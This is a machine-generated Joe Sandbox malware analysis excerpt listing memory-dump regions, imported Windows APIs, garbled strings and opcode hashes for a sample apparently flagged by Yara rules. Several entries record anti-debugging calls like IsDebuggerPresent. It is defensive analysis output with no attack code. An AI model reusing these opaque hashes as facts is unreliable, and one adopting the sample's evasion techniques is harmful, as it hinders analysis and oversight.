                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer$Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: DFEK$U%
                                            • API String ID: 829385169-3435397596
                                            • Opcode ID: 41cbdf90dec37eb52b954d10541310d96c062ecf6e52845e935639f857fb7cc0
                                            • Instruction ID: b26fc266fe437071b37e89948e38149a4b38e7e9c8995aca789c2764ccb3574b
                                            • Opcode Fuzzy Hash: 41cbdf90dec37eb52b954d10541310d96c062ecf6e52845e935639f857fb7cc0
                                            • Instruction Fuzzy Hash: 4BD24771E002549BEB58EF24CC547EEBB76AF00308F5441A8DA096B291DB38BF85CF95
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: __floor_pentium4
                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                            • API String ID: 4168288129-2761157908
                                            • Opcode ID: e4a2af43c5bc17daceace0d9627c377d7fa11afa99750231fbf68f24f9a3cb98
                                            • Instruction ID: 71a107362d346717e648338213b5422f70619b5b18563a803cf0c70334ea4234
                                            • Opcode Fuzzy Hash: e4a2af43c5bc17daceace0d9627c377d7fa11afa99750231fbf68f24f9a3cb98
                                            • Instruction Fuzzy Hash: 78D22771E092288FDB65CE28DD407EAB7B5EB44314F1441EAD44DE7240E778AEC58F86
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: "h_$+W{g$7;m4$hPf{$z.>s$l|
                                            • API String ID: 0-1895008752
                                            • Opcode ID: 8f09d10762f8eed375a5601fbd5b0040c91dc01774f279d9cb263e75dc987c63
                                            • Instruction ID: 4ad1dc9e2a905cc0b66a5f5e7205a2e4c66249be6fb9cf4453f38982f7e74ca1
                                            • Opcode Fuzzy Hash: 8f09d10762f8eed375a5601fbd5b0040c91dc01774f279d9cb263e75dc987c63
                                            • Instruction Fuzzy Hash: D9B218F360C2049FE304AE2DEC8567ABBE5EF94720F1A493DE6C4C7744E63598058697
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ;WE$C|q$Jg?w$P2W$f1[o
                                            • API String ID: 0-1059713756
                                            • Opcode ID: 4e72e0757a83aefec46ec441c01babc3dcf9532a41ee7bbec5ee2f9fc32e89cd
                                            • Instruction ID: 8eb06b91de9ffa0a379d0b35133c44369f95193ca20ddadbdc40934dc4d3dcf6
                                            • Opcode Fuzzy Hash: 4e72e0757a83aefec46ec441c01babc3dcf9532a41ee7bbec5ee2f9fc32e89cd
                                            • Instruction Fuzzy Hash: 75B2F7F360C204AFE3046E2DEC8567ABBE5EF94720F16893DE6C4C7744EA3598418697
                                            APIs
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,(@), ref: 0040CE9B
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,(@), ref: 0040CEA5
                                            • UnhandledExceptionFilter.KERNEL32(004024E3,?,?,?,?,?,(@), ref: 0040CEB2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                            • String ID: (@
                                            • API String ID: 3906539128-3675327911
                                            • Opcode ID: 699cb89c4481d733bc24bc723ff59a4702c04dd7a22af15121b47e74e86c8d00
                                            • Instruction ID: 588a31918c4d7a6a9ba75f52031696ab4f5dbddd8307c033202189b188a5c7dc
                                            • Opcode Fuzzy Hash: 699cb89c4481d733bc24bc723ff59a4702c04dd7a22af15121b47e74e86c8d00
                                            • Instruction Fuzzy Hash: 5E31C475911228ABCB21DF65D8897CDBBB4AF08310F5081EAE40CA7291E7749F858F48
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Bu$U+7{$Uls^$nuyO
                                            • API String ID: 0-2625490385
                                            • Opcode ID: 8652ed218e7de11266833a7aa602c0047aa951ccaa5fe62d0ea9df3e84df7d91
                                            • Instruction ID: 063e1ae811f370509b0c091f1c124a25b0e58945f2e9f21ff85effb73d0c9979
                                            • Opcode Fuzzy Hash: 8652ed218e7de11266833a7aa602c0047aa951ccaa5fe62d0ea9df3e84df7d91
                                            • Instruction Fuzzy Hash: 91B229F3A082149FE304AE2DEC8567AF7E5EF94620F1A893DEAC4C3744E93558458793
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: >s;n$Jn;}$RKMg$LOw
                                            • API String ID: 0-3076901036
                                            • Opcode ID: b76d300e3d28bd811791d73551008d1225e5a17fdcf55b75da4131e687e79558
                                            • Instruction ID: 4fbf349a6b9c30e79fece1c9f87790c5082d774b093af904420d10e4e97b1a0a
                                            • Opcode Fuzzy Hash: b76d300e3d28bd811791d73551008d1225e5a17fdcf55b75da4131e687e79558
                                            • Instruction Fuzzy Hash: 7FB237F36086049FE304AE2DEC8577ABBE9EF94320F1A463DE6C5C3744E63598058697
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ;Cv$<L7$zL}$%!{
                                            • API String ID: 0-1584933136
                                            • Opcode ID: 0ec80e946418ca1eda4853e918eb4b6f81bcbddd19390cb01693c2e61493beff
                                            • Instruction ID: 72a91dd953426b89fc9abd93e2b06e9d7ee1181bacb487d1700472a5ca036207
                                            • Opcode Fuzzy Hash: 0ec80e946418ca1eda4853e918eb4b6f81bcbddd19390cb01693c2e61493beff
                                            • Instruction Fuzzy Hash: FBB205F350C204AFE3047E69EC8567ABBE9EF94720F1A492DEAC4C7744E63598018797
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 7Ti$<!fB$QM~k$Yqf
                                            • API String ID: 0-3252589865
                                            • Opcode ID: 4417687318d7b2f12d392cab16b27a8d60786439bf257298cf57dec796e0b513
                                            • Instruction ID: bd0428b7ff1f3113706858d5d5ce68dc45b0ec76d0f338464580a8ef204a5106
                                            • Opcode Fuzzy Hash: 4417687318d7b2f12d392cab16b27a8d60786439bf257298cf57dec796e0b513
                                            • Instruction Fuzzy Hash: F4B2F6F3A0C2009FE704AF29EC8567AFBE9EF94720F16893DE6C583744E63558058697
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction ID: 9151a3e1b18bc91cd7565aa796d2b3fd9c13901fbfc1f0d7d8c86227081eae00
                                            • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction Fuzzy Hash: B4024F71E012199FDF14DFA8C880AADFBB1FF88314F2485A9D919E7340D731AA45DB90
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction ID: 43bc36f6878c89f3ffc6a2c396747c0521daf02947ea4f8256dba7dc923fb648
                                            • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction Fuzzy Hash: 7F022C71E00219ABDF15CFA9D8807AEBBF1FF49314F14826AD519EB381D735AA418B90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction ID: 1698085c936ca5c6c6a57ee88efec3ce2b030c017204745a192f91a5fd5d0df0
                                            • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction Fuzzy Hash: 8A025C71E002199BDF14CFA9D9806EEBBF1FF48314F24826AE919E7341D775A9818B84
                                            APIs
                                            • IsProcessorFeaturePresent.KERNEL32(00000017,12041A13), ref: 04B3A7BD
                                            • IsDebuggerPresent.KERNEL32 ref: 04B3A889
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04B3A8A9
                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 04B3A8B3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                            • String ID:
                                            • API String ID: 254469556-0
                                            • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                            • Instruction ID: 37b6013e9a577dd1b1e392eabc504ea67d8bfb2c338f5351aa0f62ce0e257004
                                            • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                            • Instruction Fuzzy Hash: 0E312775D05218DBDB10DFA5D989BCCBBB8FF08305F1041EAE44DAB250EB71AA898F45
                                            APIs
                                            • IsProcessorFeaturePresent.KERNEL32(00000017,12041A13), ref: 0040A556
                                            • IsDebuggerPresent.KERNEL32 ref: 0040A622
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A642
                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A64C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                            • String ID:
                                            • API String ID: 254469556-0
                                            • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                            • Instruction ID: 8b01d550a0a2fff4667565f177a0bd7aa15c2cc699040a0714bae659939ad5a8
                                            • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                            • Instruction Fuzzy Hash: 40311A75D0531CDBDB10DFA5D9897CDBBB8BF08304F1080AAE409A7290EB759A858F49
                                            APIs
                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10002FE6
                                            • IsDebuggerPresent.KERNEL32 ref: 100030B2
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100030D2
                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 100030DC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                            • String ID:
                                            • API String ID: 254469556-0
                                            • Opcode ID: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                            • Instruction ID: 336d1356b37294b5c1fe5cc3e7a5e53ac0bdfc53d52c9a9f50db52ddd632742b
                                            • Opcode Fuzzy Hash: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                            • Instruction Fuzzy Hash: B6312B75D45269DBEB21DF64C989BCDBBF8EF08340F1081AAE40DA7250EB719A85CF04
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0.@$P.@$p.@$p.@P.@0.@
                                            • API String ID: 0-3587633984
                                            • Opcode ID: b422344de76828a5e8cbae21da2638b275dc5e39bbf3ab9b9d7bd40fd995c566
                                            • Instruction ID: edba82406a6c8f71feb90599b62297755b71d0b6b78ea1f0b6545c1508d6edd9
                                            • Opcode Fuzzy Hash: b422344de76828a5e8cbae21da2638b275dc5e39bbf3ab9b9d7bd40fd995c566
                                            • Instruction Fuzzy Hash: 72F1D271B00205ABDB50CF68DC81BA9B7B6FF48304F1441A9EA09EB281D77AF914CB95
                                            APIs
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04B32A70), ref: 04B3D102
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04B32A70), ref: 04B3D10C
                                            • UnhandledExceptionFilter.KERNEL32(04B3274A,?,?,?,?,?,04B32A70), ref: 04B3D119
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                            • String ID:
                                            • API String ID: 3906539128-0
                                            • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                                            • Instruction ID: b8f538d7019062d84086c9f53a6f5d1d5fbf664f357c8289c6a0af6c8bf45c71
                                            • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                                            • Instruction Fuzzy Hash: 62319274911228ABCB61DF65D8887CDBBB8FF18315F5041EAE41CA7250E770AF858F45
                                            APIs
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10005798
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100057A2
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100057AF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                            • String ID:
                                            • API String ID: 3906539128-0
                                            • Opcode ID: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                            • Instruction ID: 5682311db8f2ea5b7fb0b10b77ab1de1cec722dcfd082a676ba882e0b3775376
                                            • Opcode Fuzzy Hash: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                            • Instruction Fuzzy Hash: 4B31D3749012299BDB62DF24DD89B8DBBB8EF08750F5081EAE41CA7250EB709F858F44
                                            APIs
                                            • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                            • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                            • ExitProcess.KERNEL32 ref: 10005F60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: Process$CurrentExitTerminate
                                            • String ID:
                                            • API String ID: 1703294689-0
                                            • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                            • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                            • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                            • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: .$GetProcAddress.$l
                                            • API String ID: 0-2784972518
                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction ID: 78b6e937622b060b84808a2b2c494efa2fcaad73efecce16e50acb24cef678e3
                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction Fuzzy Hash: E6316DB6900609DFDB10DF99C880AADBBF5FF48329F14418AD941A7314D771FA45CBA4
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,CA335CE0), ref: 004107F7
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID:
                                            • API String ID: 1518329722-0
                                            • Opcode ID: 5c7dfd05e128c4447f34c82fa0a83ef235602569a1e055a837d6a0b3eab8545e
                                            • Instruction ID: 9ffaf8f16d1feaf21b4895ba9d91ffe558ea63f081936d9fadb7ea4d2284f30e
                                            • Opcode Fuzzy Hash: 5c7dfd05e128c4447f34c82fa0a83ef235602569a1e055a837d6a0b3eab8545e
                                            • Instruction Fuzzy Hash: C2F0F4B5A002147F8724EF6EC8049DFBEE9EBC5370725826AE809D3340D9B4DD82C2D4
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: __floor_pentium4
                                            • String ID:
                                            • API String ID: 4168288129-0
                                            • Opcode ID: 33b49f04a218de2c7083f10be8a0aa68633273c3dfcf1cc45880ee3ed5084c1c
                                            • Instruction ID: 73816b41df38fbaa784d2d7fa09879827f854d7fca52ec6a5b54ede456d92f48
                                            • Opcode Fuzzy Hash: 33b49f04a218de2c7083f10be8a0aa68633273c3dfcf1cc45880ee3ed5084c1c
                                            • Instruction Fuzzy Hash: 56D227B1E082298FDB65CE28DD407EAB7B5FB55304F1481EAD44DE7281E778AE818F41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0Z@$Z@
                                            • API String ID: 0-605451032
                                            • Opcode ID: a43c74f0a017d1f7b27258233af7b0f8bd5ab01d46b0208e3573d12e86ff0486
                                            • Instruction ID: c2704d3dc0eafd102a63da391050ffa25cdd35e93d0e938198e091b07b9d6d51
                                            • Opcode Fuzzy Hash: a43c74f0a017d1f7b27258233af7b0f8bd5ab01d46b0208e3573d12e86ff0486
                                            • Instruction Fuzzy Hash: 7AC1DE709006079ECB34CE69C584A7BBBB1AB45304F184A3FD452BBBD2C339AC59CB59
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0$H@
                                            • API String ID: 0-2786613154
                                            • Opcode ID: ca813c29726484238c91fef20f317be1219e422960450490370ba48bfc0cd99d
                                            • Instruction ID: 4a3fd9315a5abbba8fc5c956050257a45ee5a7b78c0dcd4935651e2db0378757
                                            • Opcode Fuzzy Hash: ca813c29726484238c91fef20f317be1219e422960450490370ba48bfc0cd99d
                                            • Instruction Fuzzy Hash: 9CB1E57090460B8BDB24CE6AC555ABFB7A1AF05304F140E3FD592B77C1C739A926CB89
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: [vwW$[vwW
                                            • API String ID: 0-2838870811
                                            • Opcode ID: a043ba4a7c1c5f008a3834bd2f438115e1d7965db0297a4a8def545e9bc69a82
                                            • Instruction ID: d694340da5bdaa89050273ff4eb72be021a5eeddd23e966797f3c90f57de5bfe
                                            • Opcode Fuzzy Hash: a043ba4a7c1c5f008a3834bd2f438115e1d7965db0297a4a8def545e9bc69a82
                                            • Instruction Fuzzy Hash: 3A8107B3A086109FE708AE29DC4477EF7E5EFD4720F168A3DDAD893784DA3448418683
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: J _$Zzwn
                                            • API String ID: 0-1042504971
                                            • Opcode ID: 4b954f147fae81018a55ee6c69d3a89867899c3c42618b021893411cee9541c8
                                            • Instruction ID: 98d208ce924358f9b9f8ec810160b15c3e23779a72b8a4b4b9c3261d1dc786a9
                                            • Opcode Fuzzy Hash: 4b954f147fae81018a55ee6c69d3a89867899c3c42618b021893411cee9541c8
                                            • Instruction Fuzzy Hash: E05168F3E182045BF3106D3DEC85366B6D79BD4720F6B823C9A8897388ED795D068286
                                            APIs
                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID:
                                            • API String ID: 3997070919-0
                                            • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                            • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                            • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                            • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                            APIs
                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04B45950,?,?,00000008,?,?,04B4C8B1,00000000), ref: 04B45B82
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID:
                                            • API String ID: 3997070919-0
                                            • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction ID: e6ae9f4186ffcf231c09e7090596a75d4bcb569eac7cbe9f7cff4074e99552ea
                                            • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction Fuzzy Hash: 3CB12E31610A08EFD725CF28C486B657BE0FF85365F258698E9D9CF2A1D335E982DB40
                                            APIs
                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004156E9,?,?,00000008,?,?,0041C64A,00000000), ref: 0041591B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID:
                                            • API String ID: 3997070919-0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
